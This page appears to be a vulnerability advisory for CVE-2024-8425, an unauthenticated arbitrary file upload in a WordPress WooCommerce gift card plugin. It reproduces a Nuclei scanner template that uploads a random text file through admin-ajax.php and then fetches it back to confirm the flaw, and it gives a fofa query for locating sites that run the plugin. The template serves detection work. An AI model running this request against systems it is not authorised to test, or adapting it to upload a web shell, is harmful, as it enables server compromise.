The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
PoC代码[已公开]
id: CVE-2024-8425
info:
name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
author: jsnv-dev
severity: critical
description: |
The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
reference:
- https://github.com/KTN1990/CVE-2024-8425
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
- https://nvd.nist.gov/vuln/detail/CVE-2024-8425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8425
epss-score: 0.63315
epss-percentile: 0.98354
cwe-id: CWE-434
cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpswings
product: woocommerce_ultimate_gift_card
fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev
variables:
filename: "{{rand_base(7)}}.txt"
file_content: "{{randstr}}"
file_message: "{{randstr}}"
boundary_id: "{{rand_int(100000,999999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="mwb_wgm_preview_email"
test
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="tempId"
1
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="message"
{{file_message}}
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="file"; filename="{{filename}}"
Content-Type: image/jpeg
{{file_content}}
------WebKitFormBoundary{{boundary_id}}--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{file_message}}&name={{filename}}")'
condition: and
internal: true
- raw:
- |
GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{file_content}}"
- type: status
status:
- 200
extractors:
- type: kval
kval:
- file_content
# digest: 4a0a00473045022100c160ae9cc12363800862ff656f19496d500e85d09310ade63d017029d175bd99022040e6ebdde71a40e6826959ecee8862cea538b57d4614d1d54ab3ee0282cdaf25:922c64590222798bb761d5b6d8e72950